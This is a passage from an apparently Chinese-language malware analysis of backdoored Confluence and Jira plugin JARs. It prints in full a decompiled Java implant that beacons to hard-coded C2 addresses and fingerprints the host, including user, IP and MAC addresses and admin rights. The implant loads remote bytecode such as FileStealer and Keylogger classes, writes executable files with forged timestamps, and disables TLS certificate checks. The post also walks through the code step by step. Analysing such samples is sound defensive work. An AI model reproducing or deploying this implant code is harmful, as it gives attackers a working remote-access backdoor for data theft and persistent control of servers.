    String str = new String(http.SendHttpConn(shellEntity.getUrl(), ALLATORIxDEMO("pVsM"), map, shellEntity.getCryptionModule().encode(ALLATORIxDEMO(map2).getBytes(StandardCharsets.UTF_8)), 15000, 15000, Proxy.NO_PROXY).getResult());
    • 解码后的请求参数:
      • ujEk\rXG|Nm 解码为 User-Agent
      • TP|解码为type`
      • ) 解码为 request
    • 请求体:
      • type=request
    • 说明: 构建HTTP请求头和请求体,通过Base64解码和异或解密处理特定字段,确保隐蔽性。发送POST请求到C2服务器并接收响应。
  4. 动态类加载

    1
    2
    3
    4
    5
    6
    PostConfluencePlugin.CustomClassLoader customClassLoader = new PostConfluencePlugin.CustomClassLoader(ClassLoader.getSystemClassLoader());
    String str2 = new String(http.SendHttpConn(shellEntity.getUrl(), ALLATORIxDEMO("pVsM"), map, shellEntity.getCryptionModule().encode(customClassLoader.loadClass(ALLATORIxDEMO("iLlGpNX"), Base64.getDecoder().decode(str)).newInstance().toString().getBytes(StandardCharsets.UTF_8)), 15000, 15000, Proxy.NO_PROXY).getResult());
    if (!str2.isEmpty()) {
    Class<?> clsLoadClass = customClassLoader.loadClass(ALLATORIxDEMO("iLlGpN["), Base64.getDecoder().decode(str2));
    Object objNewInstance = clsLoadClass.newInstance();
    }
    • 解码后的类名:
      • iLlGpNX 解码为 FileStealer
      • iLlGpN[ 解码为 Keylogger
    • 说明: 使用自定义类加载器加载从C2服务器返回的Base64编码的恶意类字节码,实例化后执行特定功能(如文件窃取和键盘记录)。
  5. 系统信息收集

    1
    2
    3
    HashMap map3 = new HashMap();
    map3.put(ALLATORIxDEMO("T`P|"), ALLATORIxDEMO("+"));
    map3.put(ALLATORIxDEMO("HvSmnxM|"), InetAddress.getLocalHost().getHostName());
    • 解码后的字段名:
      • TP|解码为result`
      • HvSmnxM| 解码为 HostName
    • 说明: 通过InetAddress.getLocalHost().getHostName()获取主机名,并将其存储在HashMap中,准备发送给C2服务器。
  6. 反射机制

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    if (!objNewInstance.equals("")) {
    map3.put(ALLATORIxDEMO("SmAmUj"), ALLATORIxDEMO("FxIuE}"));
    cls = clsLoadClass;
    } else {
    cls = clsLoadClass;
    map3.put(ALLATORIxDEMO("SmAmUj"), ALLATORIxDEMO("jUzC|Sj"));
    }
    Field declaredField = cls.getDeclaredField(ALLATORIxDEMO("R|SlLm"));
    declaredField.setAccessible(true);
    map3.put(ALLATORIxDEMO("R|SlLm"), declaredField.get(objNewInstance).toString());
    • 解码后的字段名:
      • SmAmUj 解码为 SystemInfo
      • R|SlLm 解码为 getSystemInfo
    • 说明: 通过反射访问加载类的私有字段getSystemInfo,获取系统信息(如进程列表、环境变量等),并将其存储在HashMap中。
  7. 数据外传

    1
    http.SendHttpConn(shellEntity.getUrl(), ALLATORIxDEMO("pVsM"), map, shellEntity.getCryptionModule().encode(ALLATORIxDEMO(map3).getBytes(StandardCharsets.UTF_8)), 15000, 15000, Proxy.NO_PROXY);
    • 说明: 将收集的系统信息通过AES加密后,发送到目标服务器https://104.36.229.104:443/collect,确保数据不被轻易拦截和分析。
  8. 垃圾回收

    1
    System.gc();
    • 说明: 释放内存资源,保持系统运行状态正常。
  9. 循环执行

    1
    2
    3
    4
    5
    try {
    Thread.sleep(3600000L);
    } catch (InterruptedException e2) {
    e2.printStackTrace();
    }
    • 说明: 每隔1小时(3600000毫秒)执行一次上述操作,持续收集和外传系统信息。

隐私数据类型汇总

数据类型 获取方式 示例值
主机名 InetAddress.getLocalHost() DESKTOP-XXXXX
系统用户名 System.getProperty("user.name") Administrator
网络配置 ipconfig /all命令结果 IP地址、MAC地址、DNS服务器
浏览器密码 读取Login Data数据库文件 Gmail密码、银行账号
键盘记录 键盘钩子监听 输入的信用卡号、验证码
文件列表 遍历DocumentsDownloads目录 财务报告.docx密码本.txt

攻击技术总结

  1. 文件上传漏洞利用:

    • 目标: 利用文件上传功能将恶意代码上传至目标服务器。
    • 手段: 伪装成图片文件(如.jpg),通过Base64编码和混淆技术绕过文件类型检查。
  2. 动态类加载:

    • 目标: 加载远程恶意类,执行特定功能(如文件窃取、键盘记录)。
    • 手段: 使用自定义类加载器CustomClassLoader动态加载远程类字节码,绕过传统防护机制。
  3. 反射机制:

    • 目标: 访问类的私有字段,收集敏感信息。
    • 手段: 通过反射访问类的私有字段getSystemInfo,获取详细系统信息(如进程列表、环境变量等)。
  4. 加密通信:

    • 目标: 确保数据传输过程的安全和隐蔽。
    • 手段: 使用AES/CBC/PKCS5Padding加密算法对收集的系统信息进行加密,通过HTTP POST请求发送到目标服务器https://104.36.229.104:443/collect,避免被轻易拦截和分析。
  5. 定时任务:

    • 目标: 持续收集和外传系统信息。
    • 手段: 每隔1小时执行一次数据收集和外传操作,确保持续性。

接下来看第二个样本

PostJiraPlugin.jar

main

大概看下来没有很明显的问题
只有config.xml比较可疑,里面有一堆base
这里遇到的问题是jadx-1.5.2-gui(windows)反编译config.xml的时候有问题,解出来的base64中间混了大量不可见字符。可能使用低版本的jadx或其他反编译工具能够成功反编译。这里使用yakit项目于分离出来的代码审计工具Irify进行java反汇编

config_init

base64字符串直接解解不出东西,需要找解密函数

1
2
3
4
5
6
7
8
9
10
11
private static void init() throws IllegalAccessException, InstantiationException, IllegalArgumentException, InvocationTargetException {
try {
XmlConfigLoader xmlConfigLoader = new XmlConfigLoader(ClassLoader.getSystemClassLoader());
String embeddedImage = getValue("embeddedImage").trim();
Class<?> clazz = xmlConfigLoader.define(getValue("features", "featur"), Base64.getDecoder().decode(embeddedImage.substring(5, embeddedImage.length() - 5)));
Object obj = clazz.getDeclaredConstructor(new Class[0]).newInstance(new Object[0]);
obj.toString();
} catch (Exception e) {
}
}

反编译、解码后的代码

去除前5个和后5个字符即可进行base64解码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by FernFlower decompiler)
//

import java.io.BufferedReader;
import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.io.PrintWriter;
import java.io.StringWriter;
import java.lang.management.ManagementFactory;
import java.net.HttpURLConnection;
import java.net.Inet4Address;
import java.net.InetAddress;
import java.net.NetworkInterface;
import java.net.URL;
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.nio.file.Paths;
import java.security.CodeSource;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.security.PermissionCollection;
import java.security.ProtectionDomain;
import java.security.SecureRandom;
import java.security.cert.Certificate;
import java.security.cert.X509Certificate;
import java.util.ArrayList;
import java.util.Base64;
import java.util.Enumeration;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.Properties;
import java.util.Random;
import java.util.Scanner;
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;
import javax.net.ssl.HostnameVerifier;
import javax.net.ssl.HttpsURLConnection;
import javax.net.ssl.KeyManager;
import javax.net.ssl.SSLContext;
import javax.net.ssl.SSLSession;
import javax.net.ssl.TrustManager;
import javax.net.ssl.X509TrustManager;

public class MyPlugin extends ClassLoader implements X509TrustManager, HostnameVerifier {
private static String url = "https://206.206.78.190/godzilla/release.txt";
private static String cId = "jira00bZqvpuaadmZUfVK";
private static String aesKey = "fdJUSS4u4jPiS4Fmb52EleH2";
private static String headerStr = "{\"Content-Type\":\"text/plain; charset=utf-8\", \"User-Agent\":\"Mozilla/5.0 (Windows NT 11.0; Win64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/112.0.5653.213 Safari/537.36\"}";
private String sid = "";
private int sleepTime = 60;
private int sleepJitter = 50;
private static int requestTimeout = 30000;
private static Map<String, String> requestProperty = new HashMap();

public MyPlugin() {
}

private MyPlugin(ClassLoader var1) {
super(var1);
}

private Class<?> define(String var1, byte[] var2) {
try {
URL var3 = this.getClass().getProtectionDomain().getCodeSource().getLocation();
CodeSource var4 = new CodeSource(var3, (Certificate[])null);
ProtectionDomain var5 = new ProtectionDomain(var4, (PermissionCollection)null);
return this.defineClass(var1, var2, 0, var2.length, var5);
} catch (Exception var6) {
return this.defineClass(var1, var2, 0, var2.length);
}
}

private static byte[] readAllBytes(InputStream var0) throws IOException {
ByteArrayOutputStream var1 = new ByteArrayOutputStream();
byte[] var2 = new byte[4096];

int var3;
while((var3 = var0.read(var2, 0, var2.length)) != -1) {
var1.write(var2, 0, var3);
}

return var1.toByteArray();
}

private String sendRes(String var1, String var2) {
HttpURLConnection var3 = null;
String var4 = "";

try {
URL var5 = new URL(url);
var3 = (HttpURLConnection)var5.openConnection();
var3.setRequestMethod("POST");
var3.setConnectTimeout(requestTimeout);

for(Map.Entry var7 : requestProperty.entrySet()) {
var3.setRequestProperty((String)var7.getKey(), (String)var7.getValue());
}

var3.setRequestProperty("cookie", var2);
var3.setDoOutput(true);
var1 = this.encrypt(var1.getBytes(StandardCharsets.UTF_8));
OutputStream var30 = var3.getOutputStream();
Throwable var32 = null;

try {
var30.write(var1.getBytes("UTF-8"));
} catch (Throwable var25) {
var32 = var25;
throw var25;
} finally {
if (var30 != null) {
if (var32 != null) {
try {
var30.close();
} catch (Throwable var24) {
var32.addSuppressed(var24);
}
} else {
var30.close();
}
}

}

int var31 = var3.getResponseCode();
if (var31 == 200) {
if (var2 == cId) {
Map var33 = var3.getHeaderFields();
List var8 = (List)var33.get("Set-Cookie");
if (var8 != null && !var8.isEmpty()) {
String var9 = (String)var8.get(0);
String var10 = var9.split(";", 2)[0];
this.sid = var10;
}
}

InputStream var34 = var3.getInputStream();
byte[] var35 = readAllBytes(var34);
String var36 = new String(var35, StandardCharsets.UTF_8);
var4 = new String(this.decrypt(var36), StandardCharsets.UTF_8);
}
} catch (Exception var27) {
} finally {
if (var3 != null) {
var3.disconnect();
}

}

return var4;
}

private static String escapeJson(String var0) {
return var0.replace("\\", "\\\\").replace("\"", "\\\"").replace("\n", "\\n").replace("\r", "\\r").replace("\t", "\\t");
}

private static String mapToJson(Map<String, Object> var0) {
StringBuilder var1 = new StringBuilder("{");
boolean var2 = true;

for(Map.Entry var4 : var0.entrySet()) {
if (!var2) {
var1.append(",");
} else {
var2 = false;
}

var1.append("\"").append(escapeJson((String)var4.getKey())).append("\":");
Object var5 = var4.getValue();
if (var5 instanceof String) {
var1.append("\"").append(escapeJson((String)var5)).append("\"");
} else if (var5 instanceof Map) {
var1.append(mapToJson((Map)var5));
} else {
var1.append("null");
}
}

var1.append("}");
return var1.toString();
}

private Map<String, String> parseJson(String var1) {
HashMap var2 = new HashMap();
var1 = var1.trim();
if (var1.startsWith("{") && var1.endsWith("}")) {
var1 = var1.substring(1, var1.length() - 1).trim();
String[] var3 = var1.split(",");

for(String var7 : var3) {
String[] var8 = var7.split(":", 2);
if (var8.length == 2) {
String var9 = this.unquote(var8[0].trim());
String var10 = this.unquote(var8[1].trim());
var2.put(var9, var10);
}
}
}

return var2;
}

private String unquote(String var1) {
return var1.startsWith("\"") && var1.endsWith("\"") ? var1.substring(1, var1.length() - 1) : var1;
}

private String md5Hex(String var1) {
try {
MessageDigest var2 = MessageDigest.getInstance("MD5");
byte[] var3 = var2.digest(var1.getBytes(StandardCharsets.UTF_8));
StringBuilder var4 = new StringBuilder();

for(byte var8 : var3) {
var4.append(String.format("%02x", var8));
}

return var4.toString();
} catch (NoSuchAlgorithmException var9) {
throw new RuntimeException("MD5 algorithm not found", var9);
}
}

private String encrypt(byte[] var1) throws Exception {
String var2 = this.md5Hex(aesKey).substring(0, 16);
Cipher var3 = Cipher.getInstance("AES/ECB/PKCS5Padding");
SecretKeySpec var4 = new SecretKeySpec(var2.getBytes(), "AES");
var3.init(1, var4);
byte[] var5 = var3.doFinal(var1);
return Base64.getEncoder().encodeToString(var5);
}

private byte[] decrypt(String var1) throws Exception {
String var2 = this.md5Hex(aesKey).substring(0, 16);
Cipher var3 = Cipher.getInstance("AES/ECB/PKCS5Padding");
SecretKeySpec var4 = new SecretKeySpec(var2.getBytes(), "AES");
var3.init(2, var4);
byte[] var5 = var3.doFinal(Base64.getDecoder().decode(var1));
return var5;
}

private String runCommand(String[] var1) {
try {
ArrayList var2 = new ArrayList();
ProcessBuilder var3 = new ProcessBuilder(var1);
var3.redirectErrorStream(true);
Process var4 = var3.start();
BufferedReader var5 = new BufferedReader(new InputStreamReader(var4.getInputStream()));

String var6;
while((var6 = var5.readLine()) != null) {
var2.add(var6);
}

int var7 = var4.waitFor();
return String.join("; ", var2).replaceAll("\"", "");
} catch (Exception var8) {
return "";
}
}

private void getAllIpv4MacInfo(List<String> var1, List<String> var2) {
new StringBuilder();

try {
Enumeration var4 = NetworkInterface.getNetworkInterfaces();

while(var4.hasMoreElements()) {
NetworkInterface var5 = (NetworkInterface)var4.nextElement();
if (var5.isUp() && !var5.isLoopback()) {
byte[] var6 = var5.getHardwareAddress();
if (var6 != null && var6.length != 0) {
StringBuilder var7 = new StringBuilder();

for(int var8 = 0; var8 < var6.length; ++var8) {
var7.append(String.format("%02X%s", var6[var8], var8 < var6.length - 1 ? "-" : ""));
}

Enumeration var11 = var5.getInetAddresses();

while(var11.hasMoreElements()) {
InetAddress var9 = (InetAddress)var11.nextElement();
if (var9 instanceof Inet4Address) {
var1.add(var9.getHostAddress());
var2.add(var7.toString());
}
}
}
}
}

} catch (Exception var10) {
}
}

private boolean isWindowsAdmin() {
try {
Process var1 = Runtime.getRuntime().exec("net session");
var1.getInputStream().close();
var1.getOutputStream().close();
var1.getErrorStream().close();
int var2 = var1.waitFor();
return var2 == 0;
} catch (Exception var3) {
return false;
}
}

public static boolean isUnixRoot() {
try {
Process var0 = Runtime.getRuntime().exec("id -u");
Scanner var1 = new Scanner(var0.getInputStream());
if (var1.hasNextInt()) {
int var2 = var1.nextInt();
return var2 == 0;
}
} catch (Exception var3) {
}

return false;
}

private String getJarPath() {
String var1 = "";

try {
var1 = this.getClass().getProtectionDomain().getCodeSource().getLocation().getPath();
var1 = URLDecoder.decode(var1, "UTF-8");
if (var1.startsWith("file:")) {
var1 = var1.substring(5);
}

if (var1.endsWith("!")) {
var1 = var1.substring(0, var1.length() - 1);
}

File var2 = new File(var1);
var1 = var2.getAbsolutePath();
} catch (Exception var3) {
}

return var1;
}

public static String getStackTrace(Throwable var0) {
StringWriter var1 = new StringWriter();
PrintWriter var2 = new PrintWriter(var1);
var0.printStackTrace(var2);
return var1.toString();
}

public static String generateRandomString(int var0) {
String var1 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
Random var2 = new Random();
StringBuilder var3 = new StringBuilder(var0);

for(int var4 = 0; var4 < var0; ++var4) {
int var5 = var2.nextInt(var1.length());
var3.append(var1.charAt(var5));
}

return var3.toString();
}

public static int genSleepTime(int var0, int var1) {
if (var1 < 0 || var1 > 100) {
var1 = 50;
}

int var2 = (int)Math.round((double)var0 * ((double)var1 / (double)100.0F));
int var3 = var0 - var2;
int var4 = var0 + var2;
Random var5 = new Random();
return var5.nextInt(var4 - var3 + 1) + var3;
}

private Map<String, String> getInfo() {
HashMap var1 = new HashMap();

try {
InetAddress var2 = InetAddress.getLocalHost();
String var3 = var2.getHostAddress();
String var4 = var2.getHostName();
Properties var5 = System.getProperties();
String var6 = var5.getProperty("user.name");
String var7 = "l";
String var8 = System.getProperty("os.name").toLowerCase();
String var9 = "w";
String var10 = "false";
if (var8.contains("win")) {
var7 = "w";
var9 = var5.getProperty("os.version");
if (this.isWindowsAdmin()) {
var10 = "true";
}
} else if (var8.contains("mac")) {
var7 = "m";
var9 = this.runCommand(new String[]{"bash", "-c", "uname -a"});
if (isUnixRoot()) {
var10 = "true";
}
} else {
var9 = this.runCommand(new String[]{"bash", "-c", "uname -a"});
if (isUnixRoot()) {
var10 = "true";
}
}

String var11 = ManagementFactory.getRuntimeMXBean().getName();
String var12 = var11.split("@")[0];
ArrayList var13 = new ArrayList();
ArrayList var14 = new ArrayList();
this.getAllIpv4MacInfo(var13, var14);
String var15 = String.join(",", var14);
var1.put("id", cId);
var1.put("h", var4);
var1.put("u", var6);
var1.put("s", var7);
var1.put("i", var12);
var1.put("a", var9);
var1.put("p", String.join(",", var13));
var1.put("m", var15);
var1.put("r", var10);
var1.put("n", this.getJarPath());
var1.put("e", String.valueOf(this.sleepTime));
} catch (Exception var16) {
var1.put("error", getStackTrace(var16));
}

return var1;
}

public static boolean updateFileLastModified(String var0, String var1) {
try {
long var2 = Long.parseLong(var0);
long var4 = var2 * 1000L;
File var6 = new File(var1);
if (var6.exists() && var6.isFile()) {
boolean var7 = var6.setLastModified(var4);
if (!var7) {
}

return var7;
}

return false;
} catch (NumberFormatException var8) {
} catch (Exception var9) {
}

return false;
}

private String saveFile(String var1) {
HashMap var2 = new HashMap();
HashMap var3 = new HashMap();
var3.put("t", "4");

try {
String var4 = "";
String[] var5 = var1.split("\\|");
if (var5.length != 3 && var5.length != 4) {
var3.put("s", "0");
var3.put("e", "error file format");
return mapToJson(var3);
}

if (var5.length == 4) {
var4 = var5[3];
}

String var6 = "";
if (var5[0] != null && !var5[0].isEmpty()) {
var6 = var5[0];
} else {
var6 = System.getProperty("java.io.tmpdir");
}

String var7 = Paths.get(var6, var5[1]).toString();
byte[] var8 = Base64.getDecoder().decode(var5[2]);
FileOutputStream var9 = new FileOutputStream(var7);
var9.write(var8, 0, var8.length);
var9.close();
File var10 = new File(var7);
var10.setExecutable(true);
var10.setReadable(true);
var10.setWritable(true);
if (var4 != null && !var4.isEmpty()) {
updateFileLastModified(var4, var7);
}

var2.put("b", String.valueOf(var10.length()));
var3.put("s", "1");
var3.put("m", var2);
} catch (Exception var11) {
var3.put("s", "0");
var3.put("e", getStackTrace(var11));
}

return mapToJson(var3);
}

private String loader(byte[] var1) {
String var2 = "";
MyPlugin var3 = new MyPlugin(ClassLoader.getSystemClassLoader());

try {
Class var4 = var3.define("plugin", var1);
Object var11 = var4.newInstance();
var2 = var11.toString();
} catch (Exception var8) {
StringWriter var5 = new StringWriter();
PrintWriter var6 = new PrintWriter(var5);
var8.printStackTrace(var6);
String var7 = var5.toString();
var2 = var7;
}

Object var10 = null;
System.gc();
return var2;
}

private boolean handle(String var1) {
while(true) {
String var2 = var1.substring(0, 1);
String var3 = var1.substring(2);
switch (var2) {
case "0":
return true;
case "1":
String var8 = this.loader(Base64.getDecoder().decode(var3));
var1 = this.sendRes(var8, this.sid);
if (var1 != "") {
break;
}

return true;
case "2":
this.loader(Base64.getDecoder().decode(var3));
return true;
case "3":
return false;
case "4":
String[] var7 = var3.split(":");
if (var7.length > 1) {
this.sleepTime = Integer.parseInt(var7[0]);
this.sleepJitter = Integer.parseInt(var7[1]);
} else {
this.sleepTime = Integer.parseInt(var3);
}

return true;
case "5":
String var6 = this.saveFile(var3);
var1 = this.sendRes(var6, this.sid);
if (var1 != "") {
break;
}

return true;
default:
return true;
}
}
}

public String toString() {
Thread var1 = new Thread(() -> {
Map var1 = this.getInfo();
HashMap var2 = new HashMap();
if (var1.containsKey("error")) {
var2.put("t", "0");
var2.put("s", "0");
var2.put("e", var1.get("error"));
var2.remove("error");
} else {
var2.put("t", "0");
var2.put("s", "1");
}

requestProperty = this.parseJson(headerStr);

while(true) {
var2.put("m", var1);
this.sendRes(mapToJson(var2), cId);
if (this.sid != null || !this.sid.isEmpty()) {
while(true) {
var1.put("e", String.valueOf(this.sleepTime));
var2.put("m", var1);

try {
String var3 = this.sendRes(mapToJson(var2), this.sid);
if (var3 != "" && !this.handle(var3)) {
return;
}
} catch (Exception var5) {
}

try {
Thread.sleep((long)genSleepTime(this.sleepTime * 1000, this.sleepJitter));
} catch (InterruptedException var4) {
}
}
}

try {
Thread.sleep((long)genSleepTime(this.sleepTime * 1000, this.sleepJitter));
} catch (InterruptedException var6) {
}
}
});
var1.start();
return "";
}

public X509Certificate[] getAcceptedIssuers() {
return null;
}

public void checkClientTrusted(X509Certificate[] var1, String var2) {
}

public void checkServerTrusted(X509Certificate[] var1, String var2) {
}

public boolean verify(String var1, SSLSession var2) {
return true;
}

static {
try {
SSLContext var0 = SSLContext.getInstance("SSL");
var0.init((KeyManager[])null, new TrustManager[]{new MyPlugin()}, new SecureRandom());
HttpsURLConnection.setDefaultSSLSocketFactory(var0.getSocketFactory());
HttpsURLConnection.setDefaultHostnameVerifier(new MyPlugin());
} catch (Exception var1) {
}

}
}

一、通信与控制机制(源码级分析)

  1. C2通信初始化

    • 硬编码URL
      1
      private static String url = "https://206.206.78.190/godzilla/release.txt"; // 明确C2地址
    • 请求头伪装
      1
      2
      3
      // headerStr伪造浏览器UA(User-Agent)
      private static String headerStr = "{\"Content-Type\":\"text/plain; charset=utf-8\", \"User-Agent\":\"Mozilla/5.0 (Windows NT 11.0...) Chrome/112.0...\"}";
      requestProperty = this.parseJson(headerStr); // 解析为请求头键值对
  2. 加密通信流程

    • 数据发送sendRes方法):
      1
      2
      3
      4
      // 明文数据加密后发送(关键代码)
      var1 = this.encrypt(var1.getBytes(StandardCharsets.UTF_8)); // 加密请求体
      OutputStream var30 = var3.getOutputStream();
      var30.write(var1.getBytes("UTF-8")); // 发送加密数据
    • 响应处理
      1
      2
      3
      4
      // 解密服务器响应(关键代码)
      byte[] var35 = readAllBytes(var34); // 读取响应流
      String var36 = new String(var35, StandardCharsets.UTF_8);
      var4 = new String(this.decrypt(var36), StandardCharsets.UTF_8); // 解密数据
  3. 指令分发逻辑handle方法)

    • 动态加载插件(指令1):
      1
      2
      3
      4
      case "1":
      String var8 = this.loader(Base64.getDecoder().decode(var3)); // 解码并加载字节码
      var1 = this.sendRes(var8, this.sid); // 执行后回传结果
      break;
    • 文件保存操作(指令5):
      1
      2
      3
      4
      case "5":
      String var6 = this.saveFile(var3); // 调用文件写入逻辑
      var1 = this.sendRes(var6, this.sid); // 回传写入结果
      break;

二、持久化与规避检测(源码级分析)

  1. 文件持久化saveFile方法)

    • 文件写入与权限修改
      1
      2
      3
      4
      5
      FileOutputStream var9 = new FileOutputStream(var7); // 写入目标路径
      var9.write(var8, 0, var8.length); // 写入Base64解码内容
      var10.setExecutable(true); // 设置可执行权限(Linux/Unix)
      var10.setReadable(true);
      var10.setWritable(true);
    • 时间戳伪造
      1
      2
      3
      if (var4 != null && !var4.isEmpty()) {
      updateFileLastModified(var4, var7); // 修改文件时间戳(规避检测)
      }
  2. 通信规避策略

    • 睡眠抖动算法genSleepTime方法):
      1
      2
      3
      4
      5
      6
      public static int genSleepTime(int var0, int var1) {
      int var2 = (int)Math.round((double)var0 * ((double)var1 / 100.0F));
      int var3 = var0 - var2; // 计算抖动范围(如60秒±30秒)
      int var4 = var0 + var2;
      return new Random().nextInt(var4 - var3 + 1) + var3; // 生成随机等待时间
      }
    • SSL证书绕过(静态初始化块):
      1
      2
      3
      4
      5
      static {
      SSLContext var0 = SSLContext.getInstance("SSL");
      var0.init(null, new TrustManager[]{new MyPlugin()}, new SecureRandom()); // 信任所有证书
      HttpsURLConnection.setDefaultSSLSocketFactory(var0.getSocketFactory()); // 禁用证书验证
      }

三、隐私收集详情(源码级分析)

  1. 系统信息收集getInfo方法)

    • 主机名与IP地址
      1
      2
      3
      InetAddress var2 = InetAddress.getLocalHost();
      String var3 = var2.getHostAddress(); // 获取本机IP地址
      String var4 = var2.getHostName(); // 获取主机名
    • 用户与进程信息
      1
      2
      3
      String var6 = System.getProperty("user.name"); // 当前用户名
      String var11 = ManagementFactory.getRuntimeMXBean().getName();
      String var12 = var11.split("@")[0]; // 进程ID
  2. 网络指纹收集getAllIpv4MacInfo方法)

    • MAC地址遍历
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      Enumeration var4 = NetworkInterface.getNetworkInterfaces();
      while (var4.hasMoreElements()) {
      NetworkInterface var5 = (NetworkInterface)var4.nextElement();
      byte[] var6 = var5.getHardwareAddress(); // 获取网卡MAC地址
      // 格式化为XX-XX-XX-XX-XX-XX
      StringBuilder var7 = new StringBuilder();
      for (int var8=0; var8<var6.length; ++var8) {
      var7.append(String.format("%02X%s", var6[var8], var8 < var6.length-1 ? "-" : ""));
      }
      }
  3. 权限检测

    • Windows管理员检测
      1
      2
      Process var1 = Runtime.getRuntime().exec("net session"); // 执行命令检测权限
      int var2 = var1.waitFor(); // 返回0表示管理员
    • Linux Root检测
      1
      2
      3
      4
      5
      Process var0 = Runtime.getRuntime().exec("id -u");
      Scanner var1 = new Scanner(var0.getInputStream());
      if (var1.nextInt() == 0) { // UID为0表示root
      return true;
      }

四、其他关键行为(补充说明)

  1. 动态类加载loader方法)

    1
    2
    3
    MyPlugin var3 = new MyPlugin(ClassLoader.getSystemClassLoader());
    Class var4 = var3.define("plugin", var1); // 动态定义恶意类
    Object var11 = var4.newInstance(); // 实例化触发恶意代码
    • 风险:可加载远程插件(如内存马),实现无文件攻击。
  2. 异常处理隐蔽性

    1
    catch (Exception var27) {}                    // 空异常块(规避日志记录)
    • 目的:避免因异常崩溃暴露恶意行为。